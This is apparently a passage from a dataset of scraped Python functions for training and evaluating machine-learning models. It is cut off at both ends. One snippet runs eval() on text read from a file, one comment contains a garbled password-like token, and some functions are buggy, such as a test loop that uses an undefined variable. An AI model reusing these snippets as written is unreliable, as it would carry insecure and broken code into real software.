ridge_pred)\n \n \n else:\n model = make_pipeline(PolynomialFeatures(2), LinearRegression())\n model.fit(X_train, y_train)\n y_pred = model.predict(X_test)\n r2= r2_score(y_test,y_pred)\n\n\n return r2", "def train(models, X_train, y_train, X_test, y_test):\n \n # Train and test each model in a for lop\n accuracies = []\n \n for model in models:\n clf = model.fit(X_train, y_train) # Train\n score = clf.score(X_test, y_test) # Test\n accuracies.append(score)\n\n return accuracies", "def train_model(algorithm, X_train, y_train, X_test, y_test, cv_type='rand', transformation_type='tf'):\n \n model = algorithm(X_train, y_train, cv_type=cv_type)\n model_preds = model.predict(X_test)\n model_score = f1_score(y_test, model_preds, average='weighted')\n \n return model, model_score, transformation_type", "def one_experiment():\n\n # set the name of the experiment\n now = datetime.datetime.now()\n experiment_id = str(now.day) + \"_\" + str(now.month) + \"_\" + str(now.hour) + \".\" + str(now.minute)\n experiment_name = 'overfit_' + str(experiment_id)\n\n # define if you want to use preprocessed data from file\n use_prep_data = False\n if use_prep_data:\n set_params(preproc_data_id='16_5_10.16.47')\n\n # define the changing parameter and its value\n changing_param_name = 'class_weights'\n changing_param_value = [{0: 15, 1: 85}]\n # {0:15, 1:85}]#, {0:4, 1:100}, {0:3, 1:100}, {0:2, 1:100}, {0:1, 1:100}] #[{0:1, 1:1}, {0:15, 1:85}]#\n\n features_to_use = ['user', 'countries', 'session', 'format', 'token']\n # set constant parameters\n set_params(use_word_emb=1)\n set_params(epochs=40)\n set_params(features_to_use=features_to_use)\n\n # save constant parameters to a new \"experiment_..\" filgithx+P@2ub\n save_constant_parameters(experiment_name, changing_param_name)\n\n # run experiment for every parameter value\n for value in changing_param_value:\n process = psutil.Process(os.getpid())\n print(\"-----MEMORY before starting experiment ------\", int(process.memory_info().rss/(8*10**3)), \"KB\")\n\n # update the parameter value\n set_params(class_weights_1=value)\n\n # update the model_id for this new model\n now = datetime.datetime.now()\n new_model_id = str(now.day) + \"_\" + str(now.month) + \"_\" + str(now.hour) + \".\" + str(now.minute) + \".\" + str(now.second)\n\n set_params(model_id=new_model_id)\n\n # evaluate the new model and save the results in the experiment file\n oneExperiment = Process(target=run_experiment, 
args=(experiment_name,\n new_model_id, changing_param_name, value,))\n oneExperiment.start()\n oneExperiment.join()", "def computeModel(self, name, data):\n\t\tif name == \"Weibull\":\n\t\t\tmodel = Weibull(data)\n\t\t\tnamePL = \"Weibull\"\n\n\t\telif name == \"Exponential\":\n\t\t\tmodel = Exponential(data)\n#\t\t\tnamePL = \"Wykładniczy (Goel-Okumoto)\"\n\t\t\tnamePL = \"Wykładniczy\"\n\n\t\telif name == \"Gamma\":\n\t\t\tmodel = Gamma(data)\n#\t\t\tnamePL = \"Gamma (S-kształtny)\"\n\t\t\tnamePL = \"Gamma\"\n\n\t\telif name == \"Logarithmic\":\n\t\t\tmodel = Logarithmic(data)\n#\t\t\tnamePL = \"Logarytmiczny (Musa-Okumoto)\"\n\t\t\tnamePL = \"Logarytmiczny\"\n\n\t\telif name == \"Power\":\n\t\t\tmodel = Power(data)\n#\t\t\tnamePL = \"Potęgowy (Duane)\"\n\t\t\tnamePL = \"Potęgowy\"\n\n\t\telse:\n\t\t\traise Exception, \"Nieznany model '%s'\" % name\n\n\t\tprint \"\\n---\\n\", name, \"estimating...\",\n\n\t\ttry:\n\t\t\tparam, chi, ret, akaike = model.fit()\n\t\texcept Exception, e:\n\t\t\tprint \"Wyjatek!\", e\n\t\t\treturn [None, \"brak\", \"brak\", INF, name, namePL, INF]\n\n\t\t# oblicza pozostale wartosci wykresu\n\t\tbeg = len(ret) + 1\n\t\tend = beg + int((self.white2 - self.black2)/self.granSec) + 1\n\t\tcont = model.calculate(param, range(beg, end))\n\t\tret.extend(cont)\n\n\t\tprint \" alfa,beta=\", param,\n\t\tprint \" chi=\", chi\n\t\tprint \" akaike=\", akaike\n\t\tprint ret\n\n\t\t# formatowanie\n\t\talfa = round(param[0], 4)\n\t\tif len(param) == 2: \n\t\t\tbeta = round(param[1], 4) \n\t\telse: \n\t\t\tbeta = ' ';\t\t# nie ma beta w expotencjalnym\n\t\tchi = int(chi)\n\t\takaike = round(akaike, 2)\n\n\t\treturn [ret, alfa, beta, chi, name, namePL, akaike]", "def test_02_train(self):\n today = date.today()\n log_file = os.path.join(LOG_DIR, \"{}-train-{}-{}.log\".format(LOG_PREFIX, today.year, today.month))\n \n ## update the log\n country = 'india'\n date_range = ('2017-11-29', '2019-05-24')\n metric = {'rmse':0.5}\n runtime = \"00:00:01\"\n model_version = 0.1\n model_version_note = \"test model\"\n \n update_train_log(country, date_range, metric, runtime,\n model_version, model_version_note ,test=True, prefix=LOG_PREFIX)\n\n df = pd.read_csv(log_file)\n logged_metric = [literal_eval(i) for i in df['metric'].copy()][-1]\n self.assertEqual(metric,logged_metric)", "def test_one_epoch_model(self, model: nn.Module) -> Tuple[float, Dict[str, float]]:\n losses = []\n l1_criterion = nn.L1Loss()\n model.eval()\n\n # testloaders contain same length(iteration) of batch dataset\n for sample_batched in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n image = torch.autograd.Variable(sample_batched['image'].cuda())\n depth = torch.autograd.Variable(sample_batched['depth'].cuda(non_blocking=True))\n maxDepth = 1000.0\n depth_n = maxDepth/depth\n #No use self.criterion \n\n output = self.model(image)\n # Compute the loss\n\n l_depth = l1_criterion(output, depth_n)\n\n l_ssim = torch.clamp((1 - ssim(output, depth_n, val_range = 1000.0 / 10.0)) * 0.5, 0, 1)\n\n loss = (1.0 * l_ssim) + (0.1 * l_depth)\n\n \n\n if self.half:\n images = images.half()\n\n # forward + backward + optimize\n \n self._count_correct_prediction(output, depth_n)\n losses.append(loss.item())\n\n avg_loss = sum(losses) / len(losses)\n acc = self._get_epoch_acc(is_test=True)\n return avg_loss, acc\n\n # # testloaders contain same length(iteration) of batch dataset\n # for data in progressbar(self.testloader, prefix=\"[Test]\\t\"):\n # images, labels = data[0].to(self.device), data[1].to(self.device)\n\n # if 
self.half:\n # images = images.half()\n\n # # forward + backward + optimize\n # loss, outputs = self.criterion(model, images=images, labels=labels)\n # self._count_correct_prediction(outputs, labels)\n # losses.append(loss.item())\n\n # avg_loss = sum(losses) / len(losses)\n # acc = self._get_epoch_acc(is_test=True)\n # return avg_loss, acc", "def compareModel(self):\n\n # --------------------------------------------------------------------------------------------- #\n # Store the Model parameters\n lines = open(self.model, 'r').readlines()\n MyModel = {}\n for line in lines:\n if ('<source' in line) & ('name=' in line):\n srcNam = line.split('\"')[3]\n MyModel[ srcNam ] = {}\n elif ('<parameter' in line) & ('free=\"1\"' in line):\n parNam = line.split('\"')[7]\n parVal = float(line.split('\"')[11])\n MyModel[ srcNam ][ parNam ] = parVal\n else:\n pass\n\n # --------------------------------------------------------------------------------------------- #\n # Store the fitted results\n lines = open(self.outgtlike, 'r').readlines()\n CodeString = ''\n for line in lines:\n if not 'Upper limit' in line:\n CodeString += line[:-1]\n MyData = eval(CodeString) # create a dictionnary\n\n # --------------------------------------------------------------------------------------------- #\n # Compare\n for key in MyData.keys():\n if 'TS value' in MyData[key].keys():\n # The source has been fitted\n print(\"--- {} ---\".format(key))\n for k in MyModel[key].keys():\n difference = 100* (MyModel[key][k] - float(MyData[key][k].split()[0])) / MyModel[key][k] \n print(\"{0:s} differs by {1:.2f} per cent\".format(k, difference))\n return", "def test(self, load_file):\n self.load(load_file)\n table = self.truthtable()\n print \" ..... Test: Model Computes:\", table", "def test_best_val(self, te_acc):\n self.test_val = te_acc", "def test_fit():\n args = get_layer('fit', 'manual', 'temporal', False, False, window=2, step_size=3)\n run_layer(*args)", "def model_qua_launch(self, dict):\r\n list_result = []\r\n if \"SVR\" in dict:\r\n SVR = dict[\"SVR\"]\r\n if SVR[\"Auto\"]:\r\n result = SVR_b(self.ml_data.feature, self.ml_data.target, SVR[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"SVR Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = SVR_b(self.ml_data.feature, self.ml_data.target, SVR[\"Auto\"], [SVR[\"C\"],\r\n SVR[\"Kernel\"],\r\n SVR[\"Degree\"]])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"SVR Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n if \"LR\" in dict:\r\n LR = dict[\"LR\"]\r\n if LR[\"Auto\"]:\r\n result = regression_lin(self.ml_data.feature, self.ml_data.target, LR[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Linear Regression Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = regression_lin(self.ml_data.feature, self.ml_data.target, LR[\"Auto\"], LR[\"fit_intercept\"], LR[\"normalize\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Linear Regression Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"RT\" in dict:\r\n RT = dict[\"RT\"]\r\n if RT[\"Auto\"]:\r\n result = RegTree(self.ml_data.feature, 
self.ml_data.target, RT[\"Auto\"])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Regression Tree Result Auto\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = RegTree(self.ml_data.feature, self.ml_data.target, RT[\"Auto\"], [RT[\"Criterion\"],\r\n RT[\"Min_Samples_Split\"],\r\n RT[\"Min_Samples_Leaf\"]])\r\n model, score, graph, time = result\r\n result_win = Window_Quant()\r\n result_win.setWindowTitle(\"Regression Tree Result\")\r\n result_win.setData(model, score, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"KNN\" in dict:\r\n KNN = dict[\"KNN\"]\r\n if KNN[\"Auto\"]:\r\n result = knn_class(self.ml_data.feature, self.ml_data.target, KNN[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"KNN Result Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = knn_class(self.ml_data.feature, self.ml_data.target, KNN[\"Auto\"],\r\n [KNN[\"leaf_size\"], KNN[\"n_neighbors\"], KNN[\"p\"], KNN[\"metric\"]])\r\n model, matrix, dict_cr, graph, time = result\r\n self.model_quali.close()\r\n result_win = Window()\r\n result_win.setWindowTitle(\"KNN Result\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n if \"LogiR\" in dict:\r\n LogiR = dict[\"LogiR\"]\r\n if LogiR[\"Auto\"]:\r\n result = LogReg(self.ml_data.feature, self.ml_data.target, LogiR[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Logistic Regression Result Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n else:\r\n result = LogReg(self.ml_data.feature, self.ml_data.target, LogiR[\"Auto\"], [LogiR['C'],\r\n LogiR['penalty']])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Logistic Regression Result\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n if \"DTC\" in dict:\r\n DTC = dict[\"DTC\"]\r\n if DTC[\"Auto\"]:\r\n result = arbre_clas(self.ml_data.feature, self.ml_data.target, DTC[\"Auto\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Tree Decision Classification Auto\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n else:\r\n result = arbre_clas(self.ml_data.feature, self.ml_data.target, DTC[\"Auto\"],DTC[\"max_leaf_nodes\"],DTC[\"max_depth\"],DTC[\"min_samples_split\"])\r\n model, matrix, dict_cr, graph, time = result\r\n result_win = Window()\r\n result_win.setWindowTitle(\"Tree Decision Classification\")\r\n result_win.setData(model, matrix, dict_cr, graph, time)\r\n list_result.append(result_win)\r\n\r\n\r\n self.close()\r\n self.trigger_result.emit(list_result)", "def model_fit(train_features, train_actuals):\n for name in models.keys():\n est = models[name]\n est_params = params[name]\n gscv = GridSearchCV(estimator=est, param_grid=est_params, cv=5,\n scoring='neg_mean_absolute_error', return_train_score=True)\n gscv.fit(train_actuals, train_features)\n cvres = gscv.cv_results_\n print(cvres)\n print(\"best parameters are: {}\".format(gscv.best_estimator_))\n for mean_score,par in zip(cvres[\"mean_test_score\"],cvres[\"params\"]):\n print(-mean_score, par)", "def 
model_test(epo, natural):\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tn = batch_size\n\n\t\tif natural:\n\t\t\tloader = nat_test_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tloader = syn_test_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_cor_file = open(directory + \"/logs/test_\" + prefix + \"_cor_log.txt\", \"a\") # Correct\n\t\tlog_mae_file = open(directory + \"/logs/test_\" + prefix + \"_mae_log.txt\", \"a\") # MAE\n\t\tlog_dev_file = open(directory + \"/logs/test_\" + prefix + \"_dev_log.txt\", \"a\") # DEV\n\t\tlog_sam_file = open(directory + \"/logs/test_\" + prefix + \"_sam_log.txt\", \"a\") # Sample\n\n\t\tccs = []\n\t\tlabls = []\n\t\tnum_unlabeled = 0\n\t\tfor batch_idx, (data, labels) in enumerate(loader):\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\n\t\t\tif batch_idx == 0 and epo % 1000 == 0:\n\t\t\t\t# Save test sample\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\t\t\t# Save switch sample\n\t\t\t\tmodel.mode = 'synth' if natural else 'natural'\n\t\t\t\trecon_batch, _, _, _ = model(data)\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/switch_\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # Elementwise round of cellcounts\n\t\tlbls = np.concatenate(labls, axis=None) # Elementswise round of labels\n\n\t\tlog_sam_file.write(str(np.round(preds, 2)) + \"\\n\" + str(lbls) + \"\\n\")\n\t\tpreds = np.around(preds)\n\t\t#lbls = np.around(lbls)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of predictions and labels\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between preds and lbls\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Take the avg only of those deviations that weren't NaN\n\n\t\tlog_cor_file.write(str(correct)+\"\\n\")\n\t\tlog_mae_file.write(str(MAE)+\"\\n\")\n\t\tlog_dev_file.write(str(avg_dev)+\"\\n\")\n\n\t\t#logfile.write(str(correct) + \" correct, MAE: \" + str(MAE) + \", DEV: \" + str(avg_dev) + \" in \" + prefix + \" set in epoch \" + str(epoch) + \"\\n\\n\")\n\t\tlog_cor_file.close()\n\t\tlog_mae_file.close()\n\t\tlog_dev_file.close()\n\t\tlog_sam_file.close()\n\n\t\tglobal distance_sum\n\t\tdistance_sum = dist_sum\n\t\treturn correct, MAE", "def estimatePerformance(self, model):\n Y_pred = model.computeLOO()\n #performance = self.measure.multiOutputPerformance(self.Y, Y_pred)\n #performance = 
self.measure.getPerformance(self.Y, Y_pred)\n #performance = measure_utilities.aggregate(performance)\n performance = self.measure(self.Y, Y_pred)\n self.predictions.append(Y_pred)\n return performance", "def eval_model(config, period, test_data):\n if config.network == 'MLPwithGAN':\n model = MLPwithGAN(config)\n elif config.network == 'MLP':\n model = MLP(config)\n elif config.network == 'LSTM':\n model = VanillaLSTM(config)\n elif config.network == 'CNN':\n model = CNNfeature(config)\n else:\n raise Exception('Unknown model type:{}'.format(config.network))\n\n if config.ensemble:\n m = model\n model = []\n\n for i in glob(gen_path(config.path, str(period)) + '/m*'):\n m.load_state_dict(\n torch.load(gen_path(i, filename=config.network + '.pkl')))\n m.to(config.device)\n m.eval()\n model.append(m)\n else:\n model.load_state_dict(\n torch.load(gen_path(config.path, str(period), 'model', filename=config.network + '.pkl')))\n model.to(config.device)\n model.eval()\n dataloader_test = test_data[0]\n test_date = test_data[1]\n test_symbol = test_data[2]\n sc_y = joblib.load(gen_path(config.path, str(period), 'scaler', filename='training_sc_y.pkl'))\n predict_y_test, real_y_test, valid_index_test = make_prediction(dataloader_test, sc_y, model, config)\n\n stock_score = pd.DataFrame()\n stock_score[\"symbol\"] = test_symbol[valid_index_test]\n stock_score[\"score\"] = predict_y_test\n stock_score['truth'] = real_y_test\n stock_score[\"date\"] = test_date[valid_index_test]\n stock_score = stock_score.sort_values(by=[\"date\"])\n stock_score.to_csv(gen_path(config.path, 'stock_score', filename=str(period) + '.csv'), index=False)", "def test_model(loader, model):\n correct = 0\n total = 0\n model.eval()\n for data, labels in loader:\n data_batch, label_batch = data.to(device), labels.to(device)\n outputs = F.softmax(model(data_batch), dim=1)\n predicted = outputs.max(1, keepdim=True)[1]\n total += label_batch.size(0)\n correct += predicted.eq(label_batch.view_as(predicted)).sum().item()\n return (100 * correct / total)", "def model_performance_summary(df, data_all_df, cov_buck, fisc_calender, mod_start, pred_start, summ_start, summ_end):\n var = \"pv_yr\" \n agg_col = \"LINE_ORDERS\"\n select_cols = [ \"LINE_ORDERS_ACT\", \"Prediction_Trf\", \"LEAD_MNTS_ACT\", \"LD_UNCLAIMED_ACT\", \"LD_DRIVE_ACT\", \n \"IDV_LEAD_MNTS_Pred\", \"IDV_LD_UNCLAIMED_Pred\", \"IDV_LD_DRIVE_Pred\",\n \"IDV_LEAD_MNTS_ACT\", \"IDV_LD_UNCLAIMED_ACT\", \"IDV_LD_DRIVE_ACT\",\n \"HELPER_MNTS_ACT\", \"HP_UNCLAIMED_ACT\", \"HP_DRIVE_ACT\",\n \"IDV_HELPER_MNTS_Pred\", \"IDV_HP_UNCLAIMED_Pred\", \"IDV_HP_DRIVE_Pred\",\n \"IDV_HELPER_MNTS_ACT\", \"IDV_HP_UNCLAIMED_ACT\", \"IDV_HP_DRIVE_ACT\",\n \"HELPER_OVR_ACT\", \"HPN_UNCLAIMED_ACT\", \"HPN_DRIVE_ACT\",\n \"IDV_HELPER_OVR_Pred\", \"IDV_HPN_UNCLAIMED_Pred\", \"IDV_HPN_DRIVE_Pred\",\n \"IDV_HELPER_OVR_ACT\", \"IDV_HPN_UNCLAIMED_ACT\", \"IDV_HPN_DRIVE_ACT\"\n ]\n\n for i in select_cols:\n if str(i) not in data_all_df.columns:\n data_all_df[str(i)] = np.nan\n\n cov_grp_mm = dp.cov_check(\"RSS_MM\", df, cov_buck, agg_col, fisc_calender, summ_start, summ_end)\n cov_mm = dp.cov_check(\"MM\", df, cov_buck, agg_col, fisc_calender, summ_start, summ_end)\n \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n sample = pd.merge(sample, cov_grp_mm[[\"RSS_MM\", \"CAT\"]])\n sample.CAT = sample.CAT.astype(int)\n sample[\"MAPE\"] = abs(sample[\"LINE_ORDERS_ACT\"]-sample[\"Prediction_Trf\"])/sample[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels 
= [1, 2, 3, 4, 5, 6, 7]\n sample[\"MAPE_BIN\"] = pd.cut(sample['MAPE'], bins=bins, labels=labels)\n wk_list = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID >= pred_start].FISC_WK_OF_MTH_ID.unique()\n ly_start = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID == wk_list[4]].LY_FISC_WK_OF_MTH_ID.values\n ly_end = fisc_calender[fisc_calender.FISC_WK_OF_MTH_ID == wk_list[16]].LY_FISC_WK_OF_MTH_ID.values\n train = sample[((sample.FISC_WK_OF_MTH_ID >= mod_start) & (sample.FISC_WK_OF_MTH_ID < pred_start))]\n test_in_train = sample[((sample.FISC_WK_OF_MTH_ID >= ly_start[0]) & (sample.FISC_WK_OF_MTH_ID <= ly_end[0]))]\n # The 4 th index of the list has the prediction start date after excluding the 4 week hold out period\n # for analysis purpose we are considereing only 13 weeks of test period\n test = sample[((sample.FISC_WK_OF_MTH_ID >= wk_list[4]) & (sample.FISC_WK_OF_MTH_ID <= wk_list[16]))]\n fy20 = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n \n ####################################################################################\n \n df_grp_summary = fy20.groupby([\"RSS\"]).sum()[\"LINE_ORDERS_ACT\"].reset_index()\n df_grp_summary[\"LINE_ORDERS_PERC\"] = df_grp_summary[\"LINE_ORDERS_ACT\"]/df_grp_summary[\"LINE_ORDERS_ACT\"].sum()\n ####################################################################################\n \n df_sample_list = []\n df_sample_list = cu.mape_stability(train, \"Train CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(test_in_train, \"Test_in_train CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(test, \"Test CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n df_sample_list = cu.mape_stability(fy20, \"FY20 CAT\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", df_sample_list)\n stability = pd.concat(df_sample_list)\n stability.reset_index(inplace = True)\n ####################################################################################\n \n df_sample_res = cu.mape_stability_2d(fy20, \"FISC_MTH_NBR\", \"CAT\")\n grp_sum = fy20.groupby(\"FISC_MTH_NBR\").sum()[\"LINE_ORDERS_ACT\"].reset_index()\n monthly_stability_check = df_sample_res.merge(grp_sum)\n ####################################################################################\n \n mape_cov = cu.mape_stability_2d(fy20, \"CAT\", \"MAPE_BIN\")\n ####################################################################################\n \n mape_grp = cu.mape_stability_2d(fy20, \"RSS\", \"MAPE_BIN\")\n mape_grp[\"TYPE\"] = \"MAPE Buckets\"\n ####################################################################################\n \n mape_cov_grp = cu.mape_stability_2d(fy20, \"RSS\", \"CAT\")\n mape_cov_grp[\"TYPE\"] = \"Covariance Category\"\n ####################################################################################\n \n fy20 = cu.sh_mape(fy20)\n \n sh_summary = []\n for grp in fy20[\"RSS\"].unique():\n sample_df = fy20[fy20[\"RSS\"] == grp]\n\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_LD_BIN\", \"MAPE_LD\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_HP_BIN\", \"MAPE_HP\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, grp, \"MAPE_HPN_BIN\", \"MAPE_HPN\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_summary_grp = pd.concat(sh_summary)\n sh_summary_grp.reset_index(inplace = True)\n\n ####################################################################################\n\n sh_summary 
= []\n var_list = [\"pv_yr\", \"pv_roll_5wk\"]\n for var in var_list:\n sample_df = data_all_df[data_all_df.Variable_Type == var].groupby([\"FISC_WK_OF_MTH_ID\", \"FISC_YR_NBR\", \"MM\"]).sum()[select_cols].reset_index()\n sample_df = pd.merge(sample_df, cov_mm[[\"MM\", \"CAT\"]])\n sample_df = sample_df[sample_df.CAT>0]\n sample_df = sample_df[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n sample_df = cu.sh_mape(sample_df)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LDA_BIN\", \"MAPE_LD_ACT\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPA_BIN\", \"MAPE_HP_ACT\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPNA_BIN\", \"MAPE_HPN_ACT\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LD_BIN\", \"MAPE_LD\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HP_BIN\", \"MAPE_HP\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPN_BIN\", \"MAPE_HPN\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_mm_summary_df = pd.concat(sh_summary)\n sh_mm_summary_df.reset_index(inplace = True)\n\n ####################################################################################\n\n sh_summary = []\n for var in data_all_df.Variable_Type.unique():\n sample_df = data_all_df[data_all_df.Variable_Type == var].groupby([\"FISC_WK_OF_MTH_ID\", \"FISC_YR_NBR\", \"MM\"]).sum()[select_cols].reset_index()\n sample_df[select_cols] = sample_df[select_cols].replace({0:np.nan})\n sample_df = pd.merge(sample_df, cov_mm[[\"MM\", \"CAT\"]])\n sample_df = sample_df[sample_df.CAT>0]\n sample_df = sample_df[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n sample_df = cu.sh_mape(sample_df)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_LDAP_BIN\", \"MAPE_LD_ACT_PRED\", \"TOTAL_LEAD_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPAP_BIN\", \"MAPE_HP_ACT_PRED\", \"TOTAL_HELPER_ACT\", sh_summary)\n sh_summary = cu.mape_stability(sample_df, var, \"MAPE_HPNAP_BIN\", \"MAPE_HPN_ACT_PRED\", \"TOTAL_HELPERN_ACT\", sh_summary)\n sh_prop_summary = pd.concat(sh_summary)\n sh_prop_summary.reset_index(inplace = True)\n \n best_mthd = sh_prop_summary.groupby(['IDENTIFIER']).mean()['WEIGHTED MAPE'].reset_index().sort_values(by = [\"WEIGHTED MAPE\"], ascending = True)\n var_list = best_mthd[\"IDENTIFIER\"][:2].to_list()\n ####################################################################################\n\n sample_df = fy20.copy()\n sample_df = sample_df[sample_df.MM.str.contains(\"HD\")]\n sample_df = sample_df.groupby([\"FISC_WK_OF_MTH_ID\", \"MM\"]).sum()[[\"LINE_ORDERS_ACT\", \"Prediction_Trf\"]].reset_index()\n df_grp_all = sample_df.copy()\n df_grp_all[[\"LINE_ORDERS_ACT\"]] = df_grp_all[[\n \"LINE_ORDERS_ACT\"]].replace({0:np.nan})\n df_grp_all[\"MAPE_TA\"] = abs(df_grp_all[\"LINE_ORDERS_ACT\"]-df_grp_all[\"Prediction_Trf\"])/df_grp_all[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels = [1, 2, 3, 4, 5, 6, 7]\n df_grp_all[\"MAPE_TA_BIN\"] = pd.cut(df_grp_all['MAPE_TA'], bins=bins, labels=labels)\n\n var = \"pv_yr\" \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n \n sample = sample.merge(cov_grp_mm[[\"RSS_MM\", \"CAT\"]])\n sample = sample[sample.CAT > 0]\n sample = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= 
summ_end)]\n \n \n sample = data_all_df[data_all_df.Variable_Type == var].copy()\n sample = pd.merge(sample, cov_mm[[\"MM\", \"CAT\"]])\n sample = sample[sample.CAT > 0]\n sample = sample[(sample.FISC_WK_OF_MTH_ID >= summ_start) & (sample.FISC_WK_OF_MTH_ID <= summ_end)]\n fy20_mm = sample.groupby([\"FISC_WK_OF_MTH_ID\", \"MM\", \"CAT\"]).sum()[[\"LINE_ORDERS_ACT\", \"Prediction_Trf\"]].reset_index()\n fy20_mm[[\"LINE_ORDERS_ACT\" ]] = fy20_mm[[\"LINE_ORDERS_ACT\"]].replace({0:np.nan})\n fy20_mm[\"MAPE\"] = abs(fy20_mm[\"LINE_ORDERS_ACT\"]-fy20_mm[\"Prediction_Trf\"])/fy20_mm[\"LINE_ORDERS_ACT\"]\n bins= [-1, 0.1, 0.15, 0.20, 0.30, 0.50, 1.00, np.inf]\n labels = [1, 2, 3, 4, 5, 6, 7]\n fy20_mm[\"MAPE_BIN\"] = pd.cut(fy20_mm['MAPE'], bins=bins, labels=labels)\n \n df_sample_list = []\n df_sample_list = cu.mape_stability(fy20, \"FY20 RSS_MM\", \"CAT\", \"MAPE\", \"LINE_ORDERS_ACT\", 